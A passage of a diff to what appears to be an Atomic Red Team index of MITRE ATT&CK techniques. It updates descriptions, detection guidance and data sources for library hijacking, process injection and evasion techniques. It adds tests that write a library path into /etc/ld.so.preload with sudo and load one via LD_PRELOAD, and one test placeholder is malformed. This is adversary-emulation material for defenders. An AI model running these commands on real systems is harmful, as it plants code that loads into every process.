EmpireProject Create Dylib + Hijacker. Retrieved April 1, 2021. - url: https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf description: Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017. source_name: Writing Bad Malware for OSX - - url: https://www.rsaconference.com/writable/presentations/file_upload/ht-r03-malware-persistence-on-os-x-yosemite_final.pdf - description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. - Retrieved July 10, 2017. - source_name: Malware Persistence on OS X + - source_name: wardle artofmalware volume1 + url: https://taomm.org/vol1/pdfs.html + description: 'Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume + 0x1: Analysis. Retrieved March 19, 2021.' 
+ - source_name: MalwareUnicorn macOS Dylib Injection MachO + url: https://malwareunicorn.org/workshops/macos_dylib_injection.html#5 + description: Amanda Rousseau. (2020, April 4). MacOS Dylib Injection Workshop. + Retrieved March 29, 2021. + - source_name: Apple Developer Doco Archive Run-Path + url: https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/RunpathDependentLibraries.html + description: Apple Inc.. (2012, July 7). Run-Path Dependent Libraries. Retrieved + March 31, 2021. type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack 
@@ -30584,35 +22905,236 @@ defense-evasion: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-09-16T16:48:09.391Z' + modified: '2021-04-27T20:19:15.212Z' created: '2020-03-16T15:23:30.896Z' x_mitre_platforms: - macOS x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_detection: 'Objective-See''s Dylib Hijacking Scanner can be used to - detect potential cases of dylib hijacking. Monitor file systems for moving, - renaming, replacing, or modifying dylibs. Changes in the set of dylibs that - are loaded by a process (compared to past behavior) that do not correlate - with known software, patches, etc., are suspicious. Check the system for multiple - dylibs with the same name and monitor which versions have historically been - loaded into a process. ' + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + x_mitre_detection: "Monitor file systems for moving, renaming, replacing, or + modifying dylibs. Changes in the set of dylibs that are loaded by a process + (compared to past behavior) that do not correlate with known software, patches, + etc., are suspicious. Check the system for multiple dylibs with the same name + and monitor which versions have historically been loaded into a process. \n\nRun + path dependent libraries can include LC_LOAD_DYLIB, LC_LOAD_WEAK_DYLIB, + and LC_RPATH. Other special keywords are recognized by the macOS + loader are @rpath, @loader_path, and @executable_path.(Citation: + Apple Developer Doco Archive Run-Path) These loader instructions can be examined + for individual binaries or frameworks using the otool -l command. 
+ Objective-See's Dylib Hijacking Scanner can be used to identify applications + vulnerable to dylib hijacking.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: + Github EmpireProject HijackScanner)" x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_defense_bypassed: - Application control atomic_tests: [] - T1055.001: + T1574.006: technique: - created: '2020-01-14T01:26:08.145Z' - modified: '2020-06-20T22:17:59.148Z' + id: attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825 + description: "Adversaries may execute their own malicious payloads by hijacking + environment variables the dynamic linker uses to load shared libraries. During + the execution preparation phase of a program, the dynamic linker loads specified + absolute paths of shared libraries from environment variables and files, such + as LD_PRELOAD on Linux or DYLD_INSERT_LIBRARIES + on macOS. Libraries specified in environment variables are loaded first, taking + precedence over system libraries with the same function name.(Citation: Man + LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic + Libraries) These variables are often used by developers to debug binaries + without needing to recompile, deconflict mapped symbols, and implement custom + functions without changing the original library.(Citation: Baeldung LD_PRELOAD)\n\nOn + Linux and macOS, hijacking dynamic linker variables may grant access to the + victim process's memory, system/network resources, and possibly elevated privileges. + This method may also evade detection from security products since the execution + is masked under a legitimate process. Adversaries can set environment variables + via the command line using the export command, setenv + function, or putenv function. 
Adversaries can also leverage [Dynamic + Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export + variables in a shell or set variables programmatically using higher level + syntax such Python’s os.environ.\n\nOn Linux, adversaries may + set LD_PRELOAD to point to malicious libraries that match the + name of legitimate libraries which are requested by a victim program, causing + the operating system to load the adversary's malicious code upon execution + of the victim program. LD_PRELOAD can be set via the environment + variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: + TLDP Shared Libraries) Libraries specified by LD_PRELOAD are + loaded and mapped into memory by dlopen() and mmap() + respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed + Needle) (Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers) + \n\nOn macOS this behavior is conceptually the same as on Linux, differing + only in how the macOS dynamic libraries (dyld) is implemented at a lower level. 
+ Adversaries can set the DYLD_INSERT_LIBRARIES environment variable + to point to malicious libraries containing names of legitimate libraries or + functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: + Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina + Bypass) " + name: Dynamic Linker Hijacking + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1574.006 + url: https://attack.mitre.org/techniques/T1574/006 + - external_id: CAPEC-13 + source_name: capec + url: https://capec.mitre.org/data/definitions/13.html + - external_id: CAPEC-640 + source_name: capec + url: https://capec.mitre.org/data/definitions/640.html + - source_name: Man LD.SO + url: https://www.man7.org/linux/man-pages/man8/ld.so.8.html + description: Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved + June 15, 2020. + - source_name: TLDP Shared Libraries + url: https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html + description: The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved + January 31, 2020. + - source_name: Apple Doco Archive Dynamic Libraries + url: https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html + description: Apple Inc.. (2012, July 23). Overview of Dynamic Libraries. Retrieved + March 24, 2021. + - source_name: Baeldung LD_PRELOAD + url: https://www.baeldung.com/linux/ld_preload-trick-what-is + description: baeldung. (2020, August 9). What Is the LD_PRELOAD Trick?. Retrieved + March 24, 2021. + - source_name: Code Injection on Linux and macOS + url: https://www.datawire.io/code-injection-on-linux-and-macos/ + description: 'Itamar Turner-Trauring. (2017, April 18). 
“This will only hurt + for a moment”: code injection on Linux and macOS with LD_PRELOAD. Retrieved + December 20, 2017.' + - url: http://hick.org/code/skape/papers/needle.txt + description: skape. (2003, January 19). Linux x86 run-time process manipulation. + Retrieved December 20, 2017. + source_name: Uninformed Needle + - url: http://phrack.org/issues/51/8.html + description: halflife. (1997, September 1). Shared Library Redirection Techniques. + Retrieved December 20, 2017. + source_name: Phrack halfdead 1997 + - source_name: Brown Exploiting Linkers + url: http://www.nth-dimension.org.uk/pub/BTL.pdf + description: 'Tim Brown. (2011, June 29). Breaking the links: Exploiting the + linker. Retrieved March 29, 2021.' + - source_name: TheEvilBit DYLD_INSERT_LIBRARIES + url: https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/ + description: Fitzl, C. (2019, July 9). DYLD_INSERT_LIBRARIES DYLIB injection + in macOS / OSX. Retrieved March 26, 2020. + - source_name: Timac DYLD_INSERT_LIBRARIES + url: https://blog.timac.org/2012/1218-simple-code-injection-using-dyld_insert_libraries/ + description: Timac. (2012, December 18). Simple code injection using DYLD_INSERT_LIBRARIES. + Retrieved March 26, 2020. + - source_name: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass + url: https://jon-gabilondo-angulo-7635.medium.com/how-to-inject-code-into-mach-o-apps-part-ii-ddb13ebc8191 + description: Jon Gabilondo. (2019, September 22). How to Inject Code into + Mach-O Apps. Part II.. Retrieved March 24, 2021. 
+ type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack - phase_name: defense-evasion + phase_name: persistence - kill_chain_name: mitre-attack phase_name: privilege-escalation - type: attack-pattern + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2021-04-27T19:55:18.453Z' + created: '2020-03-13T20:09:59.569Z' + x_mitre_permissions_required: + - User + x_mitre_platforms: + - Linux + - macOS + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_detection: |- + Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD and DYLD_INSERT_LIBRARIES, as well as the commands to implement these changes. + + Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates. + x_mitre_is_subtechnique: true + x_mitre_version: '2.0' + identifier: T1574.006 + atomic_tests: + - name: Shared Library Injection via /etc/ld.so.preload + auto_generated_guid: 39cb0e67-dd0d-4b74-a74b-c072db7ae991 + description: "This test adds a shared library to the `ld.so.preload` list to + execute and intercept API calls. This technique was used by threat actor Rocke + during the exploitation of Linux web servers. This requires the `glibc` package.\n\nUpon + successful execution, bash will echo `../bin/T1574.006.so` to /etc/ld.so.preload. 
+ \n" + supported_platforms: + - linux + input_arguments: + path_to_shared_library_source: + description: Path to a shared library source code + type: Path + default: PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c + path_to_shared_library: + description: Path to a shared library object + type: Path + default: "/tmp/T1574006.so" + dependency_executor_name: bash + dependencies: + - description: 'The shared library must exist on disk at specified location + (#{path_to_shared_library}) + +' + prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit + 1; fi; + +' + get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} + +' + executor: + command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' + +' + cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload + +' + name: bash + elevation_required: true + - name: Shared Library Injection via LD_PRELOAD + auto_generated_guid: bc219ff7-789f-4d51-9142-ecae3397deae + description: | + This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. + + Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout. 
+ supported_platforms: + - linux + input_arguments: + path_to_shared_library_source: + description: Path to a shared library source code + type: Path + default: PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c + path_to_shared_library: + description: Path to a shared library object + type: Path + default: "/tmp/T1574006.so" + dependency_executor_name: bash + dependencies: + - description: 'The shared library must exist on disk at specified location + (#{path_to_shared_library}) + +' + prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit + 1; fi; + +' + get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} + +' + executor: + command: 'LD_PRELOAD=#{path_to_shared_library} ls + +' + name: bash + T1055.001: + technique: external_references: - source_name: mitre-attack external_id: T1055.001 @@ -30621,11 +23143,11 @@ defense-evasion: description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 + source_name: Elastic Process Injection July 2017 - url: https://www.endgame.com/blog/technical-blog/hunting-memory description: Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December 7, 2017. - source_name: Endgame HuntingNMemory June 2017 + source_name: Elastic HuntingNMemory June 2017 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 
@@ -30638,26 +23160,33 @@ defense-evasion: loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary - API responsible for loading the DLL). (Citation: Endgame Process Injection + API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017) \n\nVariations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary).(Citation: - Endgame HuntingNMemory June 2017)(Citation: Endgame Process Injection July + Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. " id: attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-11-10T18:29:30.879Z' + created: '2020-01-14T01:26:08.145Z' x_mitre_defense_bypassed: - Application control - Anti-virus x_mitre_data_sources: - - Process monitoring - - DLL monitoring - - File monitoring - - API monitoring + - 'Module: Module Load' + - 'Process: OS API Execution' + - 'Process: Process Access' x_mitre_permissions_required: - User x_mitre_detection: "Monitoring Windows API calls indicative of the various types 
@@ -30667,7 +23196,7 @@ defense-evasion: common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, - may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nMonitor + may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nMonitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. \n\nAnalyze process behavior to determine @@ -30784,9 +23313,8 @@ defense-evasion: is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling. x_mitre_data_sources: - - API monitoring - - Process monitoring - - File monitoring + - 'Process: OS API Execution' + - 'Process: Process Creation' x_mitre_contributors: - Jimmy Astle, @AstleJimmy, Carbon Black - Erika Noerenberg, @gutterchurl, Carbon Black 
@@ -30795,6 +23323,25 @@ defense-evasion: atomic_tests: [] T1480.001: technique: + created: '2020-06-23T22:28:28.041Z' + modified: '2021-03-29T19:56:42.242Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + id: attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995 + description: |- + Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents) + + Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs). 
+ + Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. + + Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful. + name: Environmental Keying + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1480.001 
@@ -30816,7 +23363,7 @@ defense-evasion: description: Song, C., et al. (2012, August 7). Impeding Automated Malware Analysis with Environment-sensitive Malware. Retrieved January 18, 2019. - source_name: Environmental Keyed HTA - url: https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files-in-internet-exploreredge/ + url: https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/ description: Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved January 16, 2019. - source_name: 'Ebowla: Genetic Malware' 
@@ -30827,47 +23374,29 @@ defense-evasion: url: https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js description: 'Warren, R. (2017, August 2). Demiguise: virginkey.js. Retrieved January 17, 2019.' - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Environmental Keying - description: |- - Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents) - - Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs). 
- - Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. - - Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful. 
- id: attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-06-24T18:52:12.719Z' - created: '2020-06-23T22:28:28.041Z' - x_mitre_contributors: - - Nick Carr, FireEye - x_mitre_detection: Detecting the use of environmental keying may be difficult - depending on the implementation. Monitoring for suspicious processes being - spawned that gather a variety of system information or perform other forms - of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short - period of time, may aid in detection. - x_mitre_data_sources: - - Process monitoring + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_permissions_required: + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' x_mitre_defense_bypassed: - Anti-virus - Host forensic analysis - Signature-based detection - Static file analysis - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - x_mitre_platforms: - - Linux - - macOS - - Windows + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_detection: Detecting the use of environmental keying may be difficult + depending on the implementation. Monitoring for suspicious processes being + spawned that gather a variety of system information or perform other forms + of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short + period of time, may aid in detection. + x_mitre_contributors: + - Nick Carr, FireEye atomic_tests: [] T1574.005: technique: 
@@ -30919,8 +23448,11 @@ defense-evasion: Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. x_mitre_data_sources: - - Process command-line parameters - - File monitoring + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + - 'Process: Process Creation' + - 'Service: Service Metadata' x_mitre_contributors: - Travis Smith, Tripwire - Stefan Kanthak 
@@ -30929,6 +23461,21 @@ defense-evasion: atomic_tests: [] T1480: technique: + created: '2019-01-31T02:10:08.261Z' + modified: '2020-06-24T18:52:12.956Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852 + description: |- + Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019) + + Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match. + name: Execution Guardrails + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1480 
@@ -30943,42 +23490,28 @@ defense-evasion: description: 'McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved June 23, 2020.' - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Execution Guardrails - description: |- - Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019) - - Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match. 
- id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-06-24T18:52:12.956Z' - created: '2019-01-31T02:10:08.261Z' - x_mitre_is_subtechnique: false - x_mitre_version: '1.1' + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_contributors: + - Nick Carr, FireEye + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_detection: Detecting the use of guardrails may be difficult depending + on the implementation. Monitoring for suspicious processes being spawned that + gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), + especially in a short period of time, may aid in detection. + x_mitre_permissions_required: + - User x_mitre_defense_bypassed: - Anti-virus - Host forensic analysis - Signature-based detection - Static file analysis - x_mitre_permissions_required: - - User - x_mitre_detection: Detecting the use of guardrails may be difficult depending - on the implementation. Monitoring for suspicious processes being spawned that - gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), - especially in a short period of time, may aid in detection. - x_mitre_data_sources: - - Process monitoring - x_mitre_contributors: - - Nick Carr, FireEye - x_mitre_platforms: - - Linux - - macOS - - Windows + x_mitre_version: '1.1' + x_mitre_is_subtechnique: false atomic_tests: [] T1211: technique: @@ -31020,10 +23553,6 @@ defense-evasion: x_mitre_defense_bypassed: - Anti-virus - System access controls - x_mitre_data_sources: - - Windows Error Reporting - - Process monitoring - - File monitoring x_mitre_contributors: - John Lambert, Microsoft Threat Intelligence Center x_mitre_version: '1.1' 
@@ -31050,7 +23579,7 @@ defense-evasion: description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 + source_name: Elastic Process Injection July 2017 - url: https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html description: MalwareTech. (2013, August 13). PowerLoader Injection – Something truly amazing. Retrieved December 16, 2017. @@ -31088,7 +23617,7 @@ defense-evasion: EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and - CreateRemoteThread.(Citation: Endgame Process Injection July + CreateRemoteThread.(Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious @@ -31105,7 +23634,7 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: privilege-escalation - modified: '2020-06-20T22:26:33.191Z' + modified: '2020-11-10T18:29:31.004Z' created: '2020-01-14T17:18:32.126Z' x_mitre_defense_bypassed: - Anti-virus 
@@ -31115,10 +23644,9 @@ defense-evasion: SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated with this technique have also used SendNotifyMessage (Citation: Microsoft SendNotifyMessage function) to trigger the associated window procedure and - eventual malicious injection. (Citation: Endgame Process Injection July 2017)' + eventual malicious injection. (Citation: Elastic Process Injection July 2017)' x_mitre_data_sources: - - Process monitoring - - API monitoring + - 'Process: OS API Execution' x_mitre_version: '1.0' x_mitre_is_subtechnique: true x_mitre_platforms: @@ -31168,9 +23696,8 @@ defense-evasion: command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe. x_mitre_data_sources: - - Binary file metadata - - Process command-line parameters - - File monitoring + - 'File: File Deletion' + - 'Command: Command Execution' x_mitre_platforms: - Linux - macOS 
@@ -31427,7 +23954,7 @@ defense-evasion: description: |- Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). - Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [.bash_profile and .bashrc](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). + Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. 
Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). external_references: - source_name: mitre-attack external_id: T1222 @@ -31469,10 +23996,10 @@ defense-evasion: x_mitre_defense_bypassed: - File system access controls x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - - Windows event logs + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Active Directory: Active Directory Object Modification' + - 'File: File Metadata' x_mitre_contributors: - CrowdStrike Falcon OverWatch - Jan Miller, CrowdStrike @@ -31537,8 +24064,10 @@ defense-evasion: x_mitre_platforms: - macOS x_mitre_data_sources: - - File monitoring - - Process command-line parameters + - 'File: File Metadata' + - 'File: 